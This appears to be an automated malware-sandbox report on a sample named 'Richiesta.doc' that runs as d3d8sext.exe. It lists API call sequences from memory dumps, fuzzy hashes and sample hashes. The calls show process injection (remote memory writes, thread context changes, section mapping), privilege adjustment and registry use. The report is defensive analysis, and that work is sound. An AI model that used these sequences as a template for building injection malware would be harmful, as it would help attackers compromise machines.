    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:AD7B9C14083B52BC532FBA5948342B98
Total matches:133
Initial Analysis Report:Open
Initial sample Analysis ID:51301
Initial sample SHA 256:ECD47F4204DA14A45CB2BBAE813C2AAA7980B92A91BA2855669D3F1BE25BEF12
Initial sample name:Richiesta.doc

Similar Executed Functions

Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
